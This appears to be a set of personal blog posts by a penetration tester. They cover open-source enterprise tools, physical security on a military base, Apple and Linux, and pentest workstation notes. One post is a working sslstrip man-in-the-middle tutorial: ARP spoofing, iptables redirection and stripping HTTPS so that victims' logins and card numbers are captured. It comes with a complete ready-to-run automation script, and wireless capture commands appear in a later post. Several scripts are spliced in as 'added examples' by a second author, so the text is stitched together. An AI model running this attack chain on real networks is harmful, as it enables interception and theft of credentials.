Four years ago, give or take, Gartner Technology Group had this to say about open source software and its emerging role in the enterprise:
By 2012, 80 per cent of all commercial software will include elements of open source technology. Many technologies are mature, stable, and well supported. They provide significant opportunities for vendors and users to lower their total cost of ownership and increase returns on investment. Ignoring this will put companies at a serious competitive disadvantage.
I’m willing to go a step further: as of 2012, the typical small to mid-sized enterprise can easily support its mission needs and IT infrastructure entirely with open source software. Most of these open source offerings would be free (as in puppies), although in some cases certain advantages could be gained by paying for an advanced version of the software or elevated support options.
In addition, many of these open source offerings represent best-of-breed solutions and in at least a couple of instances (Snort and Apache, for instance) are, in my opinion, the de facto standard.
The list of software that is presented below represents my recommendations for enterprise-level open source solutions. I have absolutely no doubt that others will have differing opinions. There are plenty of alternatives out there and this is just a single point of view, so no weird responses or flame wars, kids.
oh… and I’m sure I’ve missed something along the way, so I reserve the right to update/edit this as we move forward.
~me
- VIRTUALIZATION
Xen (http://xen.org/)
VirtualBox (www.virtualbox.org)
VirtualSquare (http://wiki.virtualsquare.org)
- DISTRIBUTED COMPUTING (Thin Clients/Remote Desktops)
Thinstation (http://www.thinstation.org/)
FreeNX (http://freenx.berlios.de/)
- CLUSTERING
Linux Virtual Server (http://www.linuxvirtualserver.org/)
Beowulf (http://www.beowulf.org/)
- SYSTEMS INTEGRATION
Chef (http://wiki.opscode.com/display/chef/Home)
- IDS/IPS (Intrusion Detection/Prevention System)
Security Onion (http://securityonion.blogspot.com/)
Snort (http://www.snort.org/)
- SNORT GUI
high-level SOC: Snorby (http://snorby.org/)
low-level tech: Sguil (http://sguil.sourceforge.net)
- NAC (Network Access Control)
PacketFence (http://www.packetfence.org/)
- NAS (Network Attached Storage)
FreeNAS (http://www.freenas.org/)
- BACKUP
Bacula (http://www.bacula.org/)
- PROJECT MANAGEMENT
]project-open[ (http://www.project-open.com/en/solutions/itsm/index.html)
- SIEM (Security Information and Event Management)
OSSIM (http://alienvault.com/community)
- SERVER OS
Ubuntu (http://www.ubuntu.com/)
CentOS (http://www.centos.org/)
RedHat Enterprise Linux (http://www.redhat.com/products/enterprise-linux/)
- CLIENT WORKSTATION OS
Ubuntu (http://www.ubuntu.com/)
Fedora (http://fedoraproject.org)
RedHat Enterprise Linux (http://www.redhat.com/products/enterprise-linux/)
- CONFIGURATION MANAGEMENT (Change Control)
Tripwire (http://sourceforge.net/projects/tripwire/)
CFEngine (http://cfengine.com/community)
- IA ANALYST WORKSTATION OS
Backtrack (http://www.backtrack-linux.org/)
- NETWORK TRAFFIC ANALYSIS TOOL
Xplico (http://www.xplico.org/)
Wireshark (http://www.wireshark.org)
Splunk (http://www.splunk.com/product)
- FIREWALL
Smoothwall (http://www.smoothwall.org)
Untangle (http://www.untangle.com)
- WEB SERVER
Apache (http://www.apache.org)
- WEB APPLICATION FIREWALL
ModSecurity (http://www.modsecurity.org/)
- ENTERPRISE PRODUCTION SERVER (LDAP, VPN, DNS, File & Print, DHCP, Proxy, Content Filter, Groupware, Mail Server, etc.)
ClearOS (http://www.clearfoundation.com/Software/overview.html)
- NETWORK HEALTH MONITORING
Nagios XI (http://www.nagios.com/)
- CMDB (Configuration Management Database) & SERVICE DESK TICKETING SYSTEMS
OTRS (http://www.otrs.com/en/products/)
rt (http://bestpractical.com/rt/)
iTop (http://www.combodo.com/spip.php?page=rubrique&id_rubrique=8)
osTicket (http://osticket.com)
- HARDWARE INVENTORY/STRESS TESTING
Inquisitor (http://www.inquisitor.ru)
- MEDIA SERVER
XBMC (http://www.xbmc.org)
FireFly (http://www.fireflymediaserver.org/)
- MOBILE DEVICE MANAGEMENT AND SYNC
Funambol (https://www.forge.funambol.org)
- VoIP (Voice over Internet Protocol)
Asterisk (http://www.asterisk.org/)
- OFFICE SUITE
OpenOffice.org (http://www.openoffice.org)
LibreOffice (http://www.libreoffice.org)
- GRAPHICS EDITING
GIMP (http://www.gimp.org)
Inkscape (http://www.inkscape.org)
…and I’m not even going to bother with enumeration of web browsers, email clients, chat programs, blah blah blah…
so, im writing this from an airport lounge. i had to go through a bag search, two ID checks and one of those creepy full-body imaging scans to get here in the first place, now i had to do it again just to get back home. i feel fairly vetted at this point. dirty…but vetted.
im here because i just finished up a pen-test for several vendors who are hoping to do business with the federal government. the exercise was conducted on-site at the local Air Force base, so i was expecting that i would have to go through pretty much more of the same in order to get anywhere near where they are keeping all the alien spacecraft and Jimmy Hoffa’s remains.
not so much, it turns out.
here’s the short of it: i am absolutely appalled.
most of my days are spent hired-out to a civilian branch of the feds. I don't do a ton of work for DoD or any of the other military sectors. It has always been my understanding that any work for the military side would entail heightened security. the scary fact is this: aside from an ID check (which was performed by contractor security staff) to get onto the base in the first place, absolutely nobody ever questioned my presence in the least. not once.
i entered buildings, i wandered halls, i opened doors. i talked to people… i even took pictures. i did all of this without a badge or an escort and i did it within the confines of several structures that deal with some fairly high level research. nobody cared.
the airport gave me more of a run-down than physical access to the heart of a military installation did.
my work for the civilian branch of the government has guards at every entrance of a building, requires key card access to go anywhere. escorts for visitors, cameras in every corner and locked doors to keep you honest.
turns out Hoffa ain’t dead. he’s researching alien technology for the feds.
he says hi, by the way.
~me
Back in the days when Steve Jobs was trying to reinvent Apple as a multimedia company (as opposed to a computer company) he did a very intelligent thing. It was a thing that neither he (nor, by proxy; Apple) really had a history of doing; he released Apple software for a non-Apple platform. I am speaking, of course, of iTunes for Windows.
This proved instrumental in the reinvention of Apple. How could they have ever dominated the music player/cell phone industry without releasing iTunes to the other 95%-ish of home computer users?
(well, the true answer is that they could have done away with ridiculous activation/media management restrictions that they place on their devices… but stick with me on this)
Now, as a linux user (and an iPhone owner), this leaves me in a bit of a quandary. Apple, to date, refuses to develop a version of iTunes for linux. I can only assume that this business decision was made for one of two reasons:
1. Apple decided that the linux demographic was simply too small to bother with. Instead of spending resources attempting to develop an iTunes version for linux, simply let them fend for themselves.
or…
2. Apple decided that instead of developing iTunes for linux, they should instead force linux-based iDevice users to migrate to an Apple product (or perhaps iTunes for Windows) in order to activate/manage their iDevices.
If reason #1 were the issue, I would completely understand. No problem. After all, the linux community is comprised of an overwhelming majority of geeks (ok, let’s say “power users“) who can fend for themselves just fine. However, time has proven that it is indeed reason #2. Allow me to explain:
It truly did not take long at all for the linux community to reverse-engineer the iDevice requirements and develop support for these devices into linux-based media management software (e.g. Rhythmbox, Amarok or Banshee, all similar to iTunes in scope). Therefore, the problem was solved. We could now transfer our music, movies, podcasts, what-have-you to our iDevices and everybody wins.
Apple immediately built an “update” to their iDevices which crippled the linux functionality.
Let’s be clear; crippling linux functionality wasn’t a “side-effect” of the update, it was the express intent of the update.
And so it began. Apple releases the update which breaks iDevice support in linux, the linux community then takes a month or so to determine the nature of the change and updates their software to accommodate. Apple retaliates with another update… ad nauseam.
Is Steve Jobs so arrogant as to believe that any significant portion of linux users will abandon their operating system simply in order to maintain functionality of their pod/phone/tablet? Apparently so.
This clearly cannot be an instance of “simply ignoring the linux community”, Apple is spending significant resources to actively wage war on us.
Apple enjoys a devout following. Its users are religiously devoted to the “cult of personality” which envelops everything that they make. I get that, I really do. I happen to like the products that Apple puts out. However, this attitude is nothing in the face of the jihadist attitude saturating the open-source community (and linux in specific).
I have a prodigious media collection. So large, in fact, that iTunes could not deal with it even if I were so inclined (trust me, I’ve tried). I also spend nearly three hours each work-day on the road. Obviously, aside from communicating, the main purpose of my iPhone is for music playback.
At this point, I have once again lost the ability to manage my media via my linux-based mediacenter. With the rise of the Android OS as a major player in the market, I am simply in awe of the sheer stupidity being displayed by Apple.
I’ll make the switch, Apple. But I don’t think it is the switch that you were hoping for.
As a side-note, the HTC Sensation (http://www.knowyourmobile.com/comparisons/855860/htc_sensation_vs_apple_iphone_4.html) is looking really sexy. You should check it out, Steve… I know I will.
~me
Ok, let’s rant about one of my pet-peeves (and boy isn’t that a list):
Ever go to one of those websites that uses SSL encryption and boldly states something like;
“We use SSL encryption to protect your data. This site is certified as absolutely secure! We DARE anyone to try to steal your information, you can feel perfectly safe telling us all your dirty little secrets”.
So, you go ahead and throw in your credit card numbers, banking information, girlfriend’s hat size, whatever. After all, they said it was safe, right?
Ok, let’s not even bring up the dozens of ways that SSL doesn’t cover you (XSS, SQL injection, etc…), let’s just focus on how easy it is to circumvent it in the first damn place. Ready? Ok, here we go:
First of all, let’s make sure we have a nice little attack platform set up. I’ll use BackTrack 4R2, you use whatever you like.
Next, let’s make sure we have a nice little tool known as “sslstrip” installed (i do, i’ll wait here if you need to go get it).
sslstrip is the piece that does the MITM (man-in-the-middle) work. Once our box sits between the victim and their gateway, sslstrip watches the web traffic passing through us, rewrites every https:// link and redirect in the pages the server sends back into plain http://, and holds the SSL session to the real site itself. The victim’s browser is never offered SSL, so whatever it submits (logins, card numbers, the lot) passes through us in the clear before we forward it on. Getting into the middle in the first place is a classic arp-spoof attack at its simplest.
First, we need to make sure that our system will actually forward the packets it receives from the victim on to the gateway instead of dropping them. To enable IP forwarding, I’ll enter the following command:
# echo 1 > /proc/sys/net/ipv4/ip_forward
The next thing I’ll do is tell the kernel to redirect any TCP packets that arrive for port 80 (the victim’s web browsing) to a local port that sslstrip will listen on, so that sslstrip can monitor, record and send it on down the line without interfering with whatever else I’m doing in the meantime:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 12345
The port that you redirect the traffic to is fairly irrelevant, just make sure that you aren’t stepping all over something already listening there, and remember the number: sslstrip has to be told to listen on that same port.
Ok, so let’s convince our target that we are their gateway to the world. Just like St. Louis. Wait, that’s the gateway to the west. Sorry. Anyway, you obviously need to know two things: the IP address of your target and the IP address of their gateway. Once you have that, the command you want is this (oh, yeah… did i mention you needed arpspoof? It ships with dsniff). Leave it running in its own terminal; it keeps re-sending the forged ARP replies for as long as it runs, and sends the real ones again when you stop it:
# arpspoof -i interface -t target_ip gateway_ip
Lastly, let’s start up sslstrip, tell it to listen (-l) on the port we redirected to (its default is 10000, so without -l it would never see a packet) and to write (-w) what it sees to a log file. By default it logs the POSTs from the stripped sessions, which is where the credentials live. My log files take the form of “target_date_time_tool” with the time being in UTC. So, for me the command would look something like this:
# sslstrip -l 12345 -w ~/forensics/engagement/target_yyyy_mm_dd_2400UTC_sslstrip
…and we go read a book. Depending on the traffic generated, we may even have time to go write a book.
If everything goes well, we convince the target that to get anywhere at all they have to go through us. We then log all their information and forward it to wherever they were trying to go. The important difference is that what the target sends us is unencrypted, because the HTTPS links they would have followed were rewritten to HTTP before they ever reached the browser; the encrypted leg runs between us and the real site. Let this cook for a while and then check the log file for goodies… One caveat: this only works on a session that starts out over plain HTTP (the victim typing a bare hostname or following an http:// link) and against sites the browser does not already know as HTTPS-only through HSTS; a browser with that policy cached ignores the stripped link and goes straight to https.
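Here is the whole sequence above rolled into one script, as an added example of my own (not part of the original write-up): it checks the two addresses and the interface, enables forwarding, adds the redirect, starts arpspoof in the background, runs sslstrip on the matching port and puts everything back when you hit ctrl-c. The script itself, its function names and the default log directory are my assumptions; it expects a Linux box run as root with iptables, arpspoof (dsniff) and sslstrip on the PATH.

```shell
#!/bin/sh
# Added example (not from the original post): the sslstrip MITM setup
# described above as one script with argument checks and cleanup.
# Assumptions, mine not the post's: Linux host run as root, with
# iptables, arpspoof (from dsniff) and sslstrip on the PATH.
set -u

LISTEN_PORT=12345   # sslstrip listen port; must match the REDIRECT --to-port

# Log file name in the post's convention: <target>_<yyyy>_<mm>_<dd>_<HHMM>UTC_<tool>.
# An optional third argument overrides the timestamp (handy for testing).
log_name() {
    printf '%s_%s_%s\n' "$1" "${3:-$(date -u +%Y_%m_%d_%H%MUTC)}" "$2"
}

# Sanity-check a dotted-quad IPv4 address before handing it to arpspoof.
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    [ "$(printf '%s' "$1" | tr -cd '.' | wc -c)" -eq 3 ] || return 1
    _oldifs=$IFS; IFS=.
    set -- $1
    IFS=$_oldifs
    for _o in "$@"; do
        [ "$_o" -le 255 ] || return 1
    done
    return 0
}

# Put things back the way they were, whichever way we exit.
cleanup() {
    iptables -t nat -D PREROUTING -p tcp --destination-port 80 \
        -j REDIRECT --to-port "$LISTEN_PORT" 2>/dev/null
    echo 0 > /proc/sys/net/ipv4/ip_forward
    # arpspoof re-sends the real gateway MAC to the victim when it gets SIGTERM
    [ -n "${ARPSPOOF_PID:-}" ] && kill "$ARPSPOOF_PID" 2>/dev/null
    return 0
}

# run_mitm <iface> <target_ip> <gateway_ip> [logdir]
run_mitm() {
    iface=$1; target=$2; gateway=$3; logdir=${4:-$HOME/forensics/engagement}
    valid_ipv4 "$target"  || { echo "bad target ip: $target"   >&2; return 1; }
    valid_ipv4 "$gateway" || { echo "bad gateway ip: $gateway" >&2; return 1; }
    [ -d "/sys/class/net/$iface" ] || { echo "no such interface: $iface" >&2; return 1; }
    for tool in iptables arpspoof sslstrip; do
        command -v "$tool" >/dev/null 2>&1 || { echo "missing: $tool" >&2; return 1; }
    done
    [ "$(id -u)" -eq 0 ] || { echo "must run as root" >&2; return 1; }
    mkdir -p "$logdir"
    trap cleanup EXIT INT TERM

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 \
        -j REDIRECT --to-port "$LISTEN_PORT"
    arpspoof -i "$iface" -t "$target" "$gateway" >/dev/null 2>&1 &
    ARPSPOOF_PID=$!
    # -l must match the redirect port; sslstrip's default is 10000.
    # Runs in the foreground until ctrl-c, which triggers cleanup.
    sslstrip -l "$LISTEN_PORT" -w "$logdir/$(log_name "$target" sslstrip)"
}

# usage: ./mitm.sh <iface> <target_ip> <gateway_ip> [logdir]
if [ "$#" -ge 3 ]; then
    run_mitm "$@"
fi
```

The cleanup trap is the part worth copying even if you run the commands by hand: a forgotten REDIRECT rule or ip_forward left at 1 is how an attack box ends up quietly proxying the lab network for the next engagement.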
Happy hunting!
~me
having a dedicated pentest system is extremely convenient, if not essential. i use a modified backtrack 4r2 system (greybox), installed locally and using flux as its window manager. boot disks have their place, but i also like to know that my work has a persistent home.
one pain, however, is that locking the screen is a bit of a chore. the largest hurdle: xscreensaver simply refuses to function under a root login. i could create non-root users, which in most other cases would be best anyway, but in this instance it creates a series of other issues i’d rather not deal with.
here’s a few quick steps that will get an auto-locking screen using root login and fluxbox. this isn’t the only solution, but certainly simple and effective.
first, let’s install two packages:
# apt-get install xautolock xlockmore
…and now, let’s open up the fluxbox startup script:
# pico ~/.fluxbox/startup
…and let’s add a couple of lines (make sure they are above ‘exec fluxbox’):
# autolocks X screen after 15 minutes of inactivity
xautolock -time 15 -locker "xlock -mode blank" -secure &
that’s it. no mess or fuss. save and exit. go ahead and manually run the xautolock command as it is listed above to start it now (or just restart fluxbox).
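here’s the same edit as a small script, an added example of mine rather than anything from the post: it puts the xautolock line above ‘exec fluxbox’ only if it isn’t there already, keeps a .bak copy, and refuses to touch a startup file that has no ‘exec fluxbox’ to anchor on. the file path and function name are my own assumptions.

```shell
#!/bin/sh
# Added example (mine, not from the original post): drop the xautolock
# line into a fluxbox startup script, above 'exec fluxbox', exactly once,
# keeping a .bak copy. Paths and names are my own assumptions.

# add_autolock <startup-file> [idle-minutes]
add_autolock() {
    startup=$1
    minutes=${2:-15}
    line="xautolock -time $minutes -locker \"xlock -mode blank\" -secure &"

    # already set up? then leave the file alone (idempotent)
    if grep -q '^xautolock ' "$startup"; then
        return 0
    fi
    # we need an 'exec fluxbox' line to anchor above
    grep -Eq '^[[:space:]]*exec[[:space:]]+fluxbox' "$startup" || return 1

    cp "$startup" "$startup.bak"
    awk -v l="$line" -v m="$minutes" '
        /^[ \t]*exec[ \t]+fluxbox/ && !done {
            print "# autolocks X screen after " m " minutes of inactivity"
            print l
            done = 1
        }
        { print }
    ' "$startup.bak" > "$startup"
}

# usage: ./add_autolock.sh ~/.fluxbox/startup [idle-minutes]
# afterwards run the xautolock line once by hand, or restart fluxbox.
if [ "$#" -ge 1 ]; then
    add_autolock "$@"
fi
```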
# airmon-ng
--determines applicable interfaces
# airmon-ng stop interface
# airmon-ng start interface
--this puts the interface into monitor mode via an interface alias (most likely mon0)
# airodump-ng -w /path/to/file/target_yyyy_mm_dd_2400UTC_tool --output-format pcap,csv InterfaceAlias
--this starts the airodump-ng scan, displays results and writes our files (the .pcap for the packets, the .csv for anything you want to script against)
** 's' changes sorting options, for instance by power-level ('d' resets defaults)
** 'r' (de)activates real-time sorting
** 'SPACE' pauses display
** 'TAB' (de)activates scrolling selections
** 'm' highlights selection (and associated stations) in one of several color choices
** 'CTRL+C' to close airodump-ng (CTRL+Z only suspends it; the capture hangs and the interface stays in monitor mode)
if you need to do a quick conversion to UTC, try this:
# date --utc
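the .csv that airodump-ng writes next to the .pcap is the easy one to script against. here’s an added example of mine (not from the original notes) that pulls the strongest APs, and the clients attached to a given BSSID, out of it. the field positions come from the header line airodump-ng writes into that file; the sample data inside the script is constructed by me in that layout, and the function names are my own.

```shell
#!/bin/sh
# Added example (mine, not from the original notes): mine the .csv that
# airodump-ng writes with --output-format pcap,csv. Field positions are
# taken from the header line airodump-ng puts in that file; the sample
# data below is constructed by me in that layout.

# sample_csv <path>: write a small constructed airodump-ng summary
sample_csv() {
    cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-03-01 12:00:00, 2011-03-01 12:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,    0,   0.  0.  0.  0,   8, HomeNet1,
66:77:88:99:AA:BB, 2011-03-01 12:00:00, 2011-03-01 12:05:00, 11,  54, WEP, WEP, , -70,   40,   12,   0.  0.  0.  0,   6, OldNet,
CC:DD:EE:FF:00:11, 2011-03-01 12:00:00, 2011-03-01 12:05:00,  1,  54, OPN, , , -55,   90,    0,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2011-03-01 12:01:00, 2011-03-01 12:04:00, -60,   35, 00:11:22:33:44:55, HomeNet1
12:34:56:78:9A:BC, 2011-03-01 12:01:00, 2011-03-01 12:04:00, -80,    5, (not associated), Guest,HomeNet1
EOF
}

# top_aps <csv> [n]: the n strongest access points as
# "power bssid channel privacy essid", strongest (least negative dBm) first
top_aps() {
    awk -F', *' '
        function trim(s) { sub(/^ +/, "", s); sub(/ +$/, "", s); return s }
        /^Station MAC/ { exit }          # station section starts; APs are done
        NF >= 14 && length($1) == 17 && $1 ~ /^[0-9A-Fa-f:]+$/ {
            printf "%s %s %s %s %s\n", trim($9), $1, trim($4), trim($6), trim($14)
        }
    ' "$1" | sort -k1,1nr | head -n "${2:-5}"
}

# clients_of <csv> <bssid>: station MACs airodump-ng saw associated with that AP
clients_of() {
    awk -F', *' -v b="$2" '
        /^Station MAC/ { in_sta = 1; next }
        in_sta && length($1) == 17 && $6 == b { print $1 }
    ' "$1"
}

# usage: ./aircsv.sh <capture-prefix>-01.csv [bssid]
if [ "$#" -ge 1 ]; then
    top_aps "$1"
    if [ "$#" -ge 2 ]; then
        clients_of "$1" "$2"
    fi
fi
```

the station section lists un-associated clients with “(not associated)” in the BSSID column, so clients_of only ever returns stations airodump-ng actually saw talking to that AP; the probed ESSIDs on those rows are where you look for names of networks the client will happily join elsewhere.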
i had hoped that getting the awus036nh to work in BT4R1 was going to be a relatively simple issue…
i made sure that the system was updated and upgraded via apt, then;
# apt-get install firmware-ralink
# cd /usr/src/drivers/compat-wireless-2010-07-10
# ./scripts/driver-select rt2x00
# make
# make install
# make unload
# modprobe rt2800usb
there was a misconfiguration issue of the AP and interface (mon0) being reported as on different channels via aireplay-ng. i downloaded the patch (http://www.backtrack-linux.org/forums/backtrack-howtos/31264-howto-alfa-802-11a-b-g-n-awus050nh-rt2800usb-backtrack-4-r1-2.html) and compiled:
# cp chan.patch /usr/src/drivers/compat-wireless-2010-07-10/net/wireless/
# cd /usr/src/drivers/compat-wireless-2010-07-10/net/wireless
# patch -p0 < chan.patch
unfortunately, not so easy.
problem 1: while the alfa did work, it was constantly dropping the connection.
problem 2: the internal bcm43xxx stopped seeing anything at all.
i tried several solutions (including the re-install of b43-fwcutter) but no love, really.
luckily, BT4R2 came out so i did a rip/replace upgrade and apparently everything is working right out of the box…
still dropping signal way too much, but we’ll see what we can do about that.
amen to muts, et al.
~me